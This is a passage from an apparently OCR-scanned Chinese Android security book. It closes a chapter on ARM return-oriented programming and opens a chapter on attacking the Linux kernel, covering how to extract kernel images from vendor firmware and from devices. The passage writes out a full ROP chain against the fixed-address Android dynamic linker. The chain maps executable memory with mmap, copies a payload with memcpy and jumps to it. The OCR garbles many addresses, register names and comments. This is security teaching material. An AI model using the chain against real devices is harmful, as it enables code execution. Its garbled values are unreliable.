利用 这 个 gadget 就 可 以 实现 传人 任意 参数 调用 mmap， 这 样 我 们 就 能 够 分 配 可 执行 的 内 存 去 
复制 和 执行 原生 代码 。 

然而 , 要 注意 到 mmap 函数 执行 之 后 ， 艺 数 会 返回 1r 指向 的 地 址 ! 所 以 有 必要 先 把 1r 指向 
一 个 gadget， 来 跳 过 栈 中 的 两 个 参数 ， 并 在 栈 上 重新 加 载 pc。 跳 过 栈 上 的 8 个 字 节 可 以 通过 弹 
出 数据 到 两 个 寄存 器 来 实现 ， 可 以 使 用 下 面 的 Thumb gadget: 


.七 ext:B0006544 














POP {R4,R5, PC} 
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根据 前 面 的 介绍 ， 可 以 在 栈 迁 移 的 过 程 中 将 1r 设置 为 0xb0006545。 否 则 ， 必 须 在 ROP 链 
的 最 前 面 完 成 这 项 工作 。 

尽管 mmap 通常 会 自己 选择 地 址 来 分 配 内 存 ,但 是 也 提供 了 选项 来 支持 固定 地 址 内 存 的 分 配 ， 
这 使 得 ROP 链 的 开发 更 加 容易 。mmap 参数 的 更 多 细节 可 以 在 其 帮助 页 面 中 找到 。 这 里 我 们 选择 
的 静态 地 址 是 0xb1008000， 是 链接 器 后 面 一 段 未 使 用 的 地 址 空间 。 第 一 部 分 的 ROP 链 如 下 : 
























































0xb00038ca # pop {r0-r4,pc} 

0xb0018000 # r0O: static allocation target address 
0x00001000 # rl: size to allocate = one page 

0x00000007 # r2: protection = read, write execute 
0x00000032 # r3: flags = MAP_ANON | MAP_PRIVATE | MAP_FIXED 
Oxdeadbeef # r4: don’'t care 

0xb0001678 # pc: dl mmap, returning to lr = 0xb006545 

从 光 下 下 下 让 正在 在 下 # fifth parameter on stack: fdq = -1 

0x00000000 # sixth parameter on stack: offset = 0 
0xdeadc0de # next gadget’'s address 

mmap 执行 后 ，1r 指向 mmap 自身 ， 因 为 它 调用 了 一 个 子 函 数 ， 所 以 1r 被 设置 成 了 调用 子 











函数 之 后 的 指令 地 址 。 这 对 于 返回 到 1r 的 gadget ( 如 mmap 函数 ) 非常 重要 。 

这 时 候 ， 要 用 来 执行 原生 代码 的 内 存 被 成 功 分 配 了 ， 但 是 目前 的 数据 都 是 0。 下 一 步 要 把 载 
荷 复制 进 这 段 内 存 ， 然 后 将 执行 转移 过 去 。 可 以 使 用 链接 器 内 部 的 memcpy 来 复制 内 存 ; 然而 ， 
即便 在 支持 控制 流 的 时 候 ， 有 一 个 寄存 器 中 存储 了 指向 原生 代码 的 指针 ， 而 现在 寄存 器 中 的 值 也 
都 已 经 被 破坏 了 。 当 然 ,， 可 以 采用 保存 这 个 指针 再 复原 的 方法 , 但 并 不 一 定 能 成 功 。 在 这 个 案例 
中 ， 我 们 利用 相 邻 WebKit string 的 特定 属性 来 解决 这 个 问题 。 

WebKit 中 代表 string 的 数据 结构 中 有 一 个 指针 指向 真实 的 字符 串 数 据 。 图 9-7 描绘 了 string 
的 数据 结构 。 通 过 把 ROP 链 分 别 放 在 两 个 string 中 ,就 有 可 能 利用 这 个 指针 。 第 一 部 分 的 ROP 链 
可 以 弹出 足够 多 的 数据 ( 指向 第 一 个 字符 串 )， 同 时 把 string 的 数据 指针 存 人 一 个 寄存 器 ， 然 后 在 
第 二 个 字符 串 的 数据 中 继续 构造 ROP 链 。 图 9-7 展示 了 string 头 的 各 个 字段 如 何 被 加 载 到 寄存 器 。 

把 string 指 针 存 和 人 r4 是 非常 有 用 的 ,相当 于 在 第 一 个 string 的 结尾 防止 一 个 栈 弹 出 的 gadget。 
这 个 gadget 首先 弹出 堆 头 和 string 大 小 ， 并 引用 数 到 ro ~ r3 中 ， 然 后 把 真正 的 字符 串 数据 指针 
放 入 z*4。 如 果 需 要 存 人 更 高 的 寄存 需 ， 则 可 以 在 第 一 个 字符 串 的 结尾 进行 填充 。 另 外 还 有 两 个 
string 头 的 元 素 需要 跳 过 ， 所 以 采用 的 gadget ( 又 是 一 个 Thumb gadget ) 如 下 所 示 : 

.text :B0005914 POP {RO-R6, PC} 

当然 mmap 的 其 他 参数 也 要 设置 好 。 首 先 ， 设置 第 一 个 参数 *0， 即 内 存 复制 的 目标 地 址 。 
下 面 的 gadget 也 能 同时 修复 1r 寄存 器 : 


.text:B000131C LDMFD SP!, {RO,LR} 
text:BOO00L320 BX LR 


由 于 不 用 清理 栈 参 数 ， 所 以 1r 只 需要 指向 从 栈 恢复 pc 的 gadget。 接 下 来 ，r2 必须 存 人 内 
存 复制 的 长 度 。r3 需要 指向 可 写 的 内 存 。 可 以 复 用 内 存 分 配 中 的 gadget。 下 一 个 gadget 是 : 
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text :B000L918 LDMFD SP!, {R2,R3} 
:Lext:BO00L91C BX LR 


Oxb0005915 popt{rO-r6,pc} 


Ee 
m refCount 人 
m_datag > Stringlmpl 


Oxdeadbeef 


下 一 个 gadget 





m hashAndFlags J 








图 9-7 弹出 string 头 中 的 字段 


注意 ， 现 在 px 1r 等 价 于 pop {pc}。r3 指向 有 效 内 存 ， 下 面 的 Thumb gadget 把 r4 存 人 
rl (r4 中 的 是 第 二 个 字符 串 的 内 容 指针 ): 














.text:B0006260 MOV R1, R4 

.text:B0006262 B loc_B0006268 

.text:B0006268 STR RIL. ‘TR 

.text :B000626A B locret_B0006274 9 
.text:B0006274 POP {R4-R7, PC} 

第 二 部 分 的 ROP 链 如 下 所 示 : 

0xb0005915 # pop over heap and string headers, pointer goes into r4 





上 第 二 个 字符 串 从 此 处 开始 





0xp000131c #' BOB, {EQ Lr). .DO LE 

0xb0018000 # r0: copy destination = allocation address 
0xb0002ab0 # lr: address of pop {pc} 

0xb0001918 “B23 芍 6 

0x00001000 # r2: copy length = one page 


0xb0018000 # r3: scratch memory = allocation address 
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0xb0006261 # rl1 <- r4 {([r3] <- r4, pop {r4-r7}) 
Oxdeadbeef # r4: don’'t care 

Oxdeadbeef # r5: don’t care 

Oxdeadbeef # r6: don’'t care 

Oxdeadbeef # r7: don’'t care 

0xdeadc0de # pc: next gadget’'s address 


现在 , memcpy 的 所 有 寄存 器 参数 都 设置 好 了 , 而 且 1r 指向 了 pop {pc} 指令 , 所 以 memcpy 
可 以 正常 返回 。 最 后 需要 调用 memcpy， 然 后 跳 转 到 代 相 应 码 中 。 复 制 完 成 后 ， 可 执行 内 存 中 包 
含 第 二 个 字符 串 的 完整 内 容 , 所 以 控制 流 跳 转 需 要 到 ROP 链 的 后 面 。 这 就 导致 跳 转 必须 加 上 ROP 
链 的 偏 移 。 结 合 两 部 分 ROP 链 、memcpy 调用 和 最 终 载荷 跳 转 ， 最 终 的 ROP 链 如 下 : 




















0xb00038ca # pop {r0-r4, pc} 

0xb0018000 # r0O: static allocation target address 

0x00001000 # 1: size to allocate = one page 

0x00000007 # r2: protection = read, write execute 

0x00000032 # r3: flags = MAP_ANON | MAP_PRIVATE | MAP_FIXED 
Oxdeadbeef # r4: don’'t care 

0xb0001678 # pc: __ dl mmap, returning to lr = 0xb006545 

从 冯 下 下 下 下 下 让 下 下 # fifth parameter on stack: fdq = -1 

0x00000000 # sixth parameter on stack: offset = 0 

0xb0005915 # pop over heap and string headers, pointer goes into r4 





上 第 二 个 字符 串 从 此 处 开始 








0xb000131c # pop {r0, lr}; bx lr 
0xb0018000 # r0: copy destination = allocation address 
0xb0002ab0 # lr: address of pop {pc} 
0xb0001918 #: OD: {E22 3 
0x00001000 # r2: copy length = one page 
0xb0018000 # r3: scratch memory = allocation address 
0xb0006261 # ri <- r4 ([r3] <- r4, pop {r4-r7}) 
Oxdeadbeef # r4: don’'t care 
Oxdeadbeef # r5: don’'t care 
Oxdeadbeef # r6: don’'t care 
Oxdeadbeef # r7: don’'t care 
0xb00001220 # __dl_ memcpy, returns to and preserves 1r 
0xb00018101 # Thumb payload jump 

9.4 小 结 


过 阅读 本 章 , 可 以 了 解 到 为 何以 及 如 何在 ARM 平 台 上 使 用 ROP 技术 , 来 获得 任意 原生 代 
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码 的 执行 。 在 最 近 的 Android 系统 版 本 中 , 使 用 ROP 的 主要 原因 是 XN 保护 的 开启 , 它 让 攻击 者 
无 法 直接 执行 普通 内 存 中 的 数据 。 即 使 没有 开启 XN 保护 ，ROP 也 可 以 用 来 解决 ARM 架构 下 指 
令 和 数据 缓存 分 离 的 问题 。 

基于 1r 的 返回 指令 导致 ROP 难度 加 大 ; 但 是 由 于 有 pop {pc} 这样 的 gadget， 一 般 基于 栈 
的 ROP 依 然 可 行 。 即 使 是 以 bx 1r 指令 结 尾 的 gadget 也 可 以 利用 ,只 要 聪明 地 将 1r 指 向 pop {pc} 
指令 即 可 。 把 ARM 指令 混 消 解析 成 Thumb 的 pop {...，pc} 指 令 给 我 们 带 来 了 更 多 的 gadget。 
ARM 的 执行 模式 可 以 通过 Interworking 机 制 支 持 来 实现 ， 即 设置 gadget 地 址 的 最 低位 就 可 以 切 
换 到 Thumb 模式。 在 ARM 这 样 的 RISC 架构 中 ,搜索 gadget 是 非常 容易 的 ， 它们 都 采用 长 度 固 
定 的 指令 编码 方式 ， 用 反 汇 编 器 生成 的 反 汇 编列 表 就 能 实现 。 

本 章 深入 介绍 了 从 Android 动态 链接 器 构建 ROP 链 的 案例 。 在 Android 4.0 和 更 早 的 版 本 中 ， 
链接 需 基 址 是 固定 的 ， 所 以 无 需 信 息 泄 露 就 能 够 构造 ROP 链 。 动 态 链 接 器 必须 出 现在 所 有 动态 
链接 的 二 进 制程 序 中 ( 包括 Android 中 默认 编译 产生 的 几乎 所 有 二 进 制 文件 )， 因 此 ， 它 会 成 为 
很 多 攻击 者 的 目标 。 

下 一 章 会 介绍 一 些 工具 和 技术 ， 来 教 你 如 何 开 发 、 调 试 和 利用 Android 操作 系统 内 核 。 











































































































攻击 内 核 








Linux 内 核 是 Android 操作 系统 的 核心 ， 是 正常 使 用 Android 设备 所 不 可 或 缺 的 。Linux 内 核 
为 应 用 层 程序 和 物理 硬件 建立 连接 ， 对 进程 进行 隔离 ,并 管理 各 种 权限 。 鉴 于 其 作用 和 地 位 ， 攻 
击 Linux 内 核 是 获得 Android 设备 完全 控制 权 的 最 直接 方式 。 

本 章 主 要 对 攻击 Android 设备 的 Linux 内 核 进行 介绍 , 包括 相关 背景 知识 , 如何 配置 、 编 译 、 
使 用 自 定义 的 内 核 与 内 核 模 块 ， 如 何 对 内 核 进行 post-mortem 和 实时 调试 ， 以 及 如 何 利用 内 核 漏 
洞 来 提升 权限 。 最 后 ， 本 章 以 几 个 案例 来 总 结 如 何 编写 三 个 漏洞 的 利用 程序 。 


10.1 Android 的 Linux 内 核 


Android 设备 使 用 的 Linux 内 核 最 早 源 于 Russell King 在 1994 年 的 项 目 一 一 将 Linux 1.0 移植 
到 Acorn AS000 世 片上。 这 个 项 目 早 于 许多 其 他 架构 上 的 Linux 内 核 移植 ， 例 如 SPARC 、Alpha 
和 MIPS 等 。 当 时 支持 ARM 的 工具 链 非常 匮乏 ，GNU 编译 器 ( GCC ) 等 很 多 工具 链 中 的 工具 都 
不 支持 ARM。 随 着 时 间 的 推移 ，ARM Linux 和 相关 工具 链 的 移植 工作 陆续 完成 。 然 而 ， 直 到 
Android 的 出 现 ，ARM Linux 内 核 才 真正 受到 关注 。 

Android 的 Linux 内 核 也 并 非 在 一 夜 之 间 出 现 , 除了 早期 的 移植 工作 外 ，Android 开发 者 也 作 
了 大 量 的 修改 , 来 支持 这 个 新 的 操作 系统 。 第 2 章 中 讨论 到 的 很 多 改动 ， 就 是 以 自 定义 驱动 的 方 
式 在 内 核 中 出 现 的。 需要 特别 注意 的 是 Binder 驱动 ， 它 是 Android 进程 间 通 信 (IPC ) 的 核心 。 
Binder 驱动 为 原生 组 件 和 Dalvik 组 件 之 间 的 通信 ， 以 及 应 用 组 件 ( 例如 Intent ) 之 间 的 通信 提供 
基础 。 另 外 ， 智 能 手机 等 敏感 设备 的 安全 性 十 分 重要 ， 这 促 生 了 许多 增强 安全 性 的 方案 。 

很 重要 的 一 点 是 ，Android 的 Linux 内 核 属于 宏 内 核 。 在 微 内 核 架 构 中 ， 许 多 驱动 可 以 在 相 
对 较 小 的 权限 下 (虽然 还 是 大 于 用 户 空间 权限 ) 运行 ， 而 对 于 Android 的 Linux 内 核 ， 所 有 驱动 
都 是 Linux 内 核 的 一 部 分 ， 完 全 在 supervisor 模式 下 运行 。 这 一 特点 再 加 上 广泛 的 攻击 面 ， 使 得 
内 核 成 为 最 具 吸 引力 的 攻击 对 象 。 


10.2 ”内 核 提 取 


Android 的 Linux 内 核 不 仅 是 单 内 核 架 构 , 而 且 本 身 就 是 单个 二 进 制 文件 ,通常 命名 为 zImage。 
zImage 文件 通常 包含 引导 程序 、 解 压 程序 ,以 及 压缩 后 的 内 核 代码 和 数据 。 当 系统 启动 时 ,压缩 
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的 镜像 会 在 解压 后 装 人 内 存 并 执行 ， 这 个 过 程 可 能 会 在 未 来 的 Android 版 本 中 发 生 改 变 。 

获得 特定 设备 中 的 该 二 进 制 镜像 文件 有 很 多 好 处 。 第 一 , 内 核 中 存 有 编译 时 的 各 种 配置 信 ， 
特别 需要 提 及 的 是 全 局 函数 和 数据 符号 ,本章 “提取 地 址 ”部 分 会 详细 介绍 。 第 二 ， 有 了 镜像 文 
件 ， 我 们 可 以 利用 IDA Pro 这 样 的 工具 去 分 析 代 码 并 找到 漏洞 。 第 三 ， 镜 像 文件 可 以 用 来 验证 已 
知 漏洞 是 否 存在 , 或 者 移植 一 些 漏洞 利用 程序 。 第 四 ， 从 较 高 层面 上 说 ， 内 核 镜像 可 以 用 来 为 新 
的 设备 定制 系统 ,或 者 为 老 的 设备 移植 新 版 本 的 Android 系统 。 提 取 内 核 镜像 文件 的 原因 可 能 
许多 , 但 是 以 上 是 最 常见 的 几 个 原因 。 

要 得 到 二 进 制 内 核 镜像 ， 首 先 必须 得 到 boot 分 区 的 镜像 ， 方 法 有 以 下 几 种 。 第 一 种 可 能 是 
最 简单 的 ， 就 是 从 出 厂 固件 镜像 (有 时 候 也 叫 ROM ) 中 提取 。 对 于 不 同 的 OEM， 提取 步 又 也 有 
所 差异 , 但 是 这 些 固 件 镜像 中 一 定 包含 着 二 进 制 文件 。 如果 你 要 尝试 root 某 个 设备 , 这 种 方法 特 
别 适用 。 

第 二 种 方法 则 需要 一 个 已 经 成 功 root 的 设备 , 从 目标 设备 中 直接 提取 二 进 制 镜像 。 这 种 方法 
适用 于 移植 或 者 缺乏 完整 ROM 的 情况 。 最 后 一 种 方法 : 许多 Android 开源 项 目 (AOSP ) 支持 设 
备 的 内 核 二 进 制 文件 位 于 AOSP 代码 仓库 的 device 目录 中 。 经 验 表 明 , 这 种 方法 不 太 可 靠 , 因为 
这 些 二 进 制 文件 与 真实 设备 中 使 用 的 内 核 镜像 相 比 ,版 本 过 时 或 有 差别 。 下 一 节 中 , 我们 会 介绍 
如 何 使 用 前 两 种 方法 来 获取 内 核 镜像 。 


10.2.1 ”从 出 厂 固件 中 提取 内 核 


要 获得 给 定 设 备 的 出 厂 固件 , 有 时 很 简单 ， 有 时 则 很 困难 。 例 如 谷歌 使 用 常见 的 TAR 和 ZIP 
工具 对 镜像 进行 打包 ， 并 把 Nexus 设备 的 所 有 原 厂 镜像 放 在 了 https://developers.google.com/ 
android/nexus/images， 任 何人 都 可 以 免费 下 载 ， 无需 认证 。 有 一 些 厂商 使 用 了 专 有 的 文件 格式 来 
发 布 固件 ， 在 这 种 情况 下 ， 如 果 没 有 开源 工具 可 用 ， 要 访问 里 面 的 内 容 就 需要 厂商 的 专用 工具 ， 
比较 困难 。 本 节 介绍 如 何 从 各 种 原 三 固件 中 提取 boot.img， 以 及 如 何 从 中 解压 出 内 核 镜像 。 

1. Nexus 出 厂 镜像 

很 多 地 方 都 能 下 载 到 Nexus 设备 的 原矿 镜像 , 因此 它 的 内 核 二 进 制 文件 非常 容易 获得 。 例 如 
在 本 书 撰写 过 程 中 发 布 的 Android 4.4, 通过 下 载 Nexus 5 的 镜像 , 就 可 以 抽取 最 新 的 内 核 来 分 析 。 
下 载 原 厂 镜像 后 ， 可 以 使 用 下 列 命令 来 解压 缩 : 


dev:~/android/n5 $ tar zxf hammerhead-krtl6m-factory-bd9c39de.tgz 
dev:~/android/n5 $ cd hammerhead-krt1l6m/ 
dev:~/android/n5/hammerhead-krtil6m $ ls 
bootloader-hammerhead-HHZ11d.img 

flash-all.bat 

flash-all.sh* 

flash-base.sh* 

image-hammerhead-krt16m.zip 
radio-hammerhead-M8974A-1.0.25.0.17.img 
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boot 和 recovery 分 区 的 镜像 分 别 是 image-hammerhead-krt16m.zip 中 的 boot.img 和 recovery.img。 
boot.img 是 最 重要 的 文件 ， 因 为 内 核 在 引导 过 程 中 用 到 了 它 : 
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dev:~/android/n5/hammerhead-krtl6m $ unzip -d img \ 
image-hammerhead-krtli6m.zip boot.img 
Archive: image-hammerhead-krtl6m.zip 

inflating: img/boot.img 
dev:~/android/n5/hammerhead-krtl6m $ cd img 
dev:~/android/n5/hammerhead-krt1l6m/img $ 


到 目前 为 止 ， 你 已 经 得 到 了 boot.img ， 但 是 还 需要 从 中 提取 内 核 ， 这 个 步骤 将 在 10.2.3 节 
中 介绍 。 

2. OEM 原 厂 固件 

寻找 OEM 提供 的 原 厂 固件 并 从 中 提取 内 核 ,要 比 Nexus 设备 麻烦 很 多 .如 前 所 述 ,每 家 OEM 
都 有 自己 的 流程 、 工 具 和 原 厂 固件 的 专 有 文件 格式 。 有 些 厂商 其 至 不 会 发 布 他 们 的 原 厂 固件 ， 而 
是 强制 你 使 用 他 们 的 工具 来 获得 固件 。 即便 是 那些 提供 原 厂 固件 镜像 的 厂商 , 也 需要 使 用 专用 的 
工具 来 提取 或 更 新 ROM。 本 节 介 绍 从 六 大 Android 设备 厂商 的 原 厂 固件 中 提取 boot.img 的 步 又。 
附录 A 列 出 了 这 些 OEM 更 新 和 提取 固件 的 工具 。 

华硕 

华硕 的 原 厂 固件 镜像 是 zip 压缩 的 blob 文件 ， 可 以 在 官方 支持 网 站 下 载 。 使 用 Github 的 
“BlobTools” 项 目 ， 可 以 将 boot.img 等 文件 从 blob 中 提取 出 来 。 

HTC 

HTC 通常 不 会 发 布 原 厂 固件 ， 在 其 开发 中 心 的 网 站 上 只 能 找到 一 小 部 分 ; 但 是 ， 在 第 三 方 
网 站 上 可 以 找到 很 多 HTC 的 ROM， 都 是 以 ROM 更 新 工具 (RUU ) 的 格式 发 布 的 。 幸运 的 是 ， 
有 一 些 开源 工具 可 以 从 RUU 中 提取 出 rom.zip, 这 样 就 无 需 使 用 Windows 系统 了 。 在 rom.zip 中 ， 
boot_signed.img 就 是 boot.img 加 上 一 个 额外 的 头 部 ， 可 以 通过 如 下 步 又 来 提取 : 


dev:~/android/htc-m7-ruu $ unzip rom.zip boot_unsigned.img 
Gad 
inflating: boot_signed.img 
dev:~/android/htc-m7-ruu $ dd if=boot_signed.img of=boot.img bs=256 skip=1 
[ss 


把 256 字 节 的 头 部 删 去 ， 就 可 以 得 到 boot . img。 

LG 

LG 的 升级 和 还 原 工具 非常 复杂 和 特殊 。LG 手机 支持 工具 甚至 需要 使 用 移动 设备 国际 辨识 码 
(IMEI ) 来 查询 后 端 系 统 。 幸 运 的 是 ， 通 过 搜索 手机 型 号 加 上 “stock ROM” 关 键 词 ， 就 能 轻松 
找到 大 多 数 设备 的 原 厂 ROM。 糟糕 的 是 ，LG 为 ROM 使 用 了 很 多 专 有 的 格式 ， 包 括 BIN/TOT， 
KDZ 和 CAB, 使 提取 变 得 很 困难 。 社 区 中 有 开发 者 开发 了 一 些 工具 ， 简 化 了 其 内 核 提取 。 

我 们 从 CAB 文件 说 起 ， 共 分 为 三 步 。 首 先 , 用 支持 这 种 压缩 格式 的 工具 解压 CAB 文件 。 然 

， 使 用 闭 源 的 LGExtract 工具 (只 支持 Windows 平 台 ) 从 WDB 文件 中 提取 出 一 个 BIN 文件 。 
， XDA 开发 者 论坛 的 http:/forum.xda-developers.com/showthread.php? 人 1$66532 页 
面 找到 。 最 后 ， tps el Ron onavl OPidbxtraetorth 的 LGBinExtract 工具 从 BIN 中 提取 
各 个 组 件 。 在 BIN 目录 中 , 会 有 一 个 8-BOOT.img 文件 。 这 就 是 你 要 找 的 文件 ,文件 名 前 面 的 数 
字 可 能 会 变化 。 在 六 大 制造 商 中 ，LG 的 原 厂 固件 是 最 复杂 的 。 
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摩托 罗拉 

正如 大 多 数 OEM 一 样 ， 摩 托 罗 拉 也 不 提供 原 厂 固件 镜像 的 直接 下 载 。 由 于 大 家 对 这 些 镜像 
有 需求 ， 一 些 社区 提供 了 下 载 。 过 去 的 摩托 罗拉 设备 使 用 专 有 的 SBF 文件 格式 ， 可 以 使 用 
sbf_flash 的 -x 选项 来 提取 文件 。 得 到 的 CG35.img 文件 就 是 要 找 的 bootimg。 较 新 的 设备 使 
用 zip 文件 (.xml.zip ) 来 包含 各 种 分 区 镜像 ， 包 括 bootimg。 

三 星 

三 星 使 用 专用 工具 Kies 来 分 发 原 厂 固件 。 除 了 这 个 工具 以 外 ,社区 网 站 SamMobile 也 提供 
了 大 量 的 三 星 原 厂 固件 下 载 。 三 星 使 用 .tar.md5 的 文件 扩展 ， 表 明 这 只 是 一 个 带 上 MD5 的 TAR 




































































文件 。 它 们 通常 也 是 使 用 zip 进行 压缩 的 。 先 进行 zip 解压 ， 然 后 解压 缩 TAR 就 能 得 到 boot.img 
文件 。 
索尼 


索尼 使 用 索尼 更 新 服务 ( SUS ) 工具 来 发 布 固 件 。 另 外 , 社区 Xperia Firmware 提供 了 很 多 设 
备 的 固件 镜像 下 载 。 索 尼 设 备 的 固件 使 用 FTF 格式 ， 事 实 上 只 是 一 个 zip 文件。 然而， 固件 的 很 
多 组 件 都 有 专 有 的 文件 格式 ， 我 们 最 关注 的 文件 是 kernel.sin。 与 其 他 OEM 不 同 ， 索 尼 并 不 使 用 
boot.img 的 格式 。 一 个 叫 作 Andoxyde 的 工具 尽管 非常 庞大 ， 但 是 支持 从 这 个 格式 中 提取 内 核 。 
另外 , Binwalk 和 ag 工具 也 能 够 做 到 这 一 点 。Binwalk 工具 可 以 从 中 提取 出 一 个 ELF 文件 和 两 个 
gzip 文件 流 ， 第 一 个 gzip 文件 流 就 是 你 想 要 的 zImage 文件 。 


10.2.2 ”从 设备 中 提取 内 核 


与 从 原矿 固件 中 提取 内 核 不 同 ， 不 管 是 什么 设备 类 型 (型 号 、 厂 商 、 运 营 商 等 )， 直 接 从 设 
备 中 提取 内 核 的 方法 都 大 致 相同 。 通 用 的 步骤 包括 : 找到 对 应 的 分 区 ， 把 内 容 dump 出 来 ， 然 后 
进行 提取 。 

有 很 多 方法 可 以 找到 哪个 分 区 中 有 boot.img 的 数据 。 首 先 ， 可 以 使 用 /dev/block/platform 中 
SoC 特性 条 目 中 的 by-name 目录 : 

shell@android:/data/local/tmp $ cd /dev/block/platform/*/by-name 


shell@android:/dev/block/platform/msm_ sdcc.1l/by-name $ 1s -1 boot 
lrwxrwxrwx root root 1970-01-02 11:28 boot -> /dev/block/mmcblk0p20 
















































































警告 ”一 些 设备 在 by-name 目录 中 也 有 一 个 aboot 条 目 。 写 boot 分 区 的 时 候 , 小 心 别 写 入 这 
个 aboot 分 区 ， 这 会 让 你 的 设备 变 砖 。 


可 以 直接 使 用 这 个 软 链接 目录 ,也 可 以 使 用 它 指向 的 块 设备 。 另 外 一 种 方法 是 , 根据 每 个 分 
区 的 前 儿 字 节 来 判断 : 
root@android:/data/local/tmp/kernel # for ii in /dev/block/m*; do \ 
BASE=` ../busybox basename $ii.; \ 


dq if=$ii of=SBASE count=1 2> /dev/null; \ 
done 
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root@android:/data/local/tmp/kernel # grep ANDROID * 
Binary file mmcblk0p20 matches 
Binary file mmcblk0p21 matches 


不 幸 的 是 ,这 样 会 找到 两 个 匹配 结果 ( 可 能 更 多 )。boot 和 recovery 分 区 使 用 了 相同 的 格式 ， 
可 以 根据 头 部 信息 区 分 出 boot 分区， 因为 与 recovery 分 区 相 比 ，boot 分 区 的 ramdisk_size 更 小 。 

现在 就 可 以 从 设备 分 区 中 dump 数据 了 。 要 注意 的 是 ， 从 分 区 中 dump 出 来 的 数据 中 包含 一 
些 无 用 数据 ， 而 从 原 厂 固件 中 提取 出 来 的 镜像 才 是 有 用 的 。 所 以 ， 从 分 区 中 直接 dump 出 的 文件 
要 比 出 厂 的 boot.img 大 一 些 。 可 以 使 用 aa 工具 来 dump 分 区 : 


root@android:/data/local/tmp/kernel # dd \ 
if=/dev/block/platform/omap/omap_hsmmc.0/by-name/boot of=cur-boot.img 
16384+0 records in 

16384+0 records out 

8388608 bytes transferred in 1.635 secs (5130647 bytes/sec) 
root@android:/data/local/tmp/kernel # chmod 644 *.img 
root@android:/data/local/tmp/kernel # 


从 boot 分 区 中 dump 出 cur-boot.img 文件 后 ,使 用 chmoa 修改 权限 ， 让 ADB 用 户 可 以 从 设 
备 中 取出 文件 ， 取 出 的 命令 如 下 : 


dev:~/android/src/kernel/omap $ mkdir staging && cd $_ 
dev:~/android/src/kernel/omap/staging $ adb pull \ 
/data/local/tmp/kernel/cur-boot.img 

2379 KB/s (8388608 bytes in 3.442s) 


最 后 一 步 是 从 启动 镜像 中 提取 内 核 。 


10.2.3 ”从 启动 镜像 中 提取 内 核 


Android 设备 启动 Linux 内 核 的 时 候 有 两 种 模式 : 第 一 种 是 正常 的 启动 过 程 , 使 用 boot 分 区 ; 
第 二 种 是 启动 恢复 过 程 ,使 用 recovery 分 区 。 这 两 种 分 区 的 底层 结构 是 相同 的 ,都 有 一 个 短 的 头 
部 , 一 个 压缩 后 的 内 核 ， 以 及 一 个 内 存盘 (initrd ) 镜像 。 在 正常 启动 过 程 中 , 压缩 的 内 核对 于 系 
统 安全 来 说 是 至 关 重 要 的 ， 所 以 重点 在 于 获得 这 个 内 核 。 

boot.img 和 recovery.img 文件 由 三 个 部 分 组 成 。 文 件 的 最 前 面 是 一 个 头 部 ， 包 含 用 于 识别 文 
件 格式 的 信息 ， 以 及 文件 其 余部 分 的 基本 信息 。 关 于 这 个 头 部 结构 的 更 多 信息 , 请 查看 AOSP 代 
人 码 仓库 中 的 system/core/mkboot img/bootimg.h 文件 。 这 个 结构 中 的 page_size 域 非常 重要 ， 
为 内 核 和 initrd 镜像 会 与 这 个 大 小 的 块 边界 对 齐 。 
压缩 的 内 核 就 位 于 头 部 之 后 的 下 一 个 块 边界 。 它 的 大 小 存储 在 头 部 结构 的 kernel_size 域 
当中 。initrd 镜像 则 开始 于 之 后 的 块 边界 。 

手动 提取 这 些 部 分 是 很 乏味 的 。AOSP 中 的 mkbootimg 工具 可 以 用 来 从 源码 构建 系统 镜像 ， 
但 是 并 不 能 用 来 提取 镜像 。 于 是 ， 基 于 mkbootimg 的 工具 abootimg 诞生 了 ， 它 能 够 解 开 镜像 
文件 ， 如 下 所 示 : 


dev:~/android/n5/hammerhead-krtl6m/img $ mkdir boot && cd $_ 
dev:~/android/n5/hammerhead-krtl6m/img/boot $ abootimg -x ../boot.img 
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writing boot image config in bootimg.cfg 
extracting kernel in zImage 
extracting ramdisk in initrd.img 


这 样 就 可 以 得 到 想 要 的 zlImage 文件 。 


10.2.4 解压 内 核 


进一步 分 析 内 核 二 进 制 文件 , 就 需要 解压 zImage。Linux 内 核 支持 三 种 不 同 的 压缩 算法 :gzip、 
lzma 和 lzo。 总 的 来 说 ， 大 多 数 Android 内 核 使 用 传统 的 gzip 算法 。Linux 内 核 中 包含 一 个 脚本 
scripts/extract-vmlinux, 但 是 它 在 Android 内 核 上 不 起 作用 ， 所 以 必须 手动 解压 内 核 。 感 
谢 Binwalk 工具 ， 大 大 简化 了 这 个 过 程 : 

dev:~/android/n5/hammerhead-krt1i6m/img/boot $ binwalk zImage | head 

1 Ox48B4 gzip compressed data, from Unix, NULL 

date: Wed Dec 31 18:00:00 1969, max compression 


| 
dev:~/android/n5/hammerhead-krt1i6m/img/boot $ dd if=zImage bs=18612 \ 
skip=1 | gzip -cd > piggy 


上 面 第 二 个 命令 把 aa 的 输出 传 给 gzip 命令 来 解压 缩 。 得 到 解压 后 的 镜像 ， 就 可 以 从 中 提 
取 细 节 ， 或 者 使 用 IDAPro 来 分 析 内 核 代码 。 本 章 后 面 的 几 节 会 讨论 如 何 从 解压 后 的 内 核 中 提取 
特定 信息 。 
10.3 ”运行 自 定义 内 核 代 码 

在 攻击 内 核 时 ， 如 果 能 在 其 中 引入 一 些 新 的 代码 , 会 非常 有 用 。 你 可 以 使 用 自 定义 的 内 核 模 
块 来 监控 内 核 的 行为 。 修 改 内 核 的 选项 ， 可 以 开启 一 些 强大 的 特性 , 例如 远程 调试 。 不管 处 于 哪 
种 情况 ， 如 果 不 利 用 内 核 漏洞 ， 都 需要 使 用 Android 和 Linux 内 核 工具 来 编译 新 的 代码 。 本 节 会 
带 你 了 解 获 取 内 核 源 代码 ， 配 置 编译 环境 ,配置 内 核 , 编译 自 定 义 内 核 模 块 , 再 把 新 代码 加 载 到 
基于 AOSP 以 及 由 OEM 提供 的 Android 设备 的 整个 过 程 。 本 章 以 基于 AOSP 的 Galaxy Nexus 和 
Sprint 版 三 星 Galaxy S3 手机 作为 示例 。 


10.3.1 ”获取 源 代码 


在 为 设备 编译 自 定义 的 模块 或 内 核 之 前 ,必须 获得 源 代码 。 得 到 源 代 码 的 方式 多 种 多 样 ， 取 
决 于 设备 的 内 核 由 谁 负责 。 谷 歌 提 供 了 AOSP 支持 设备 的 内 核 Git 仓库 ， 而 OEM 可 能 使 用 了 不 
同 的 方法 来 分 发 内 核 源 代码 。 因 为 Linux 内 核 以 GNU 公开 许可 证 (GPL ) 第 二 版 来 发 布 ， 所 以 
发 布 源 代码 ， 包 括 对 内 核 进 行 修改 ， 是 厂商 的 法 定义 务 。 

















































































































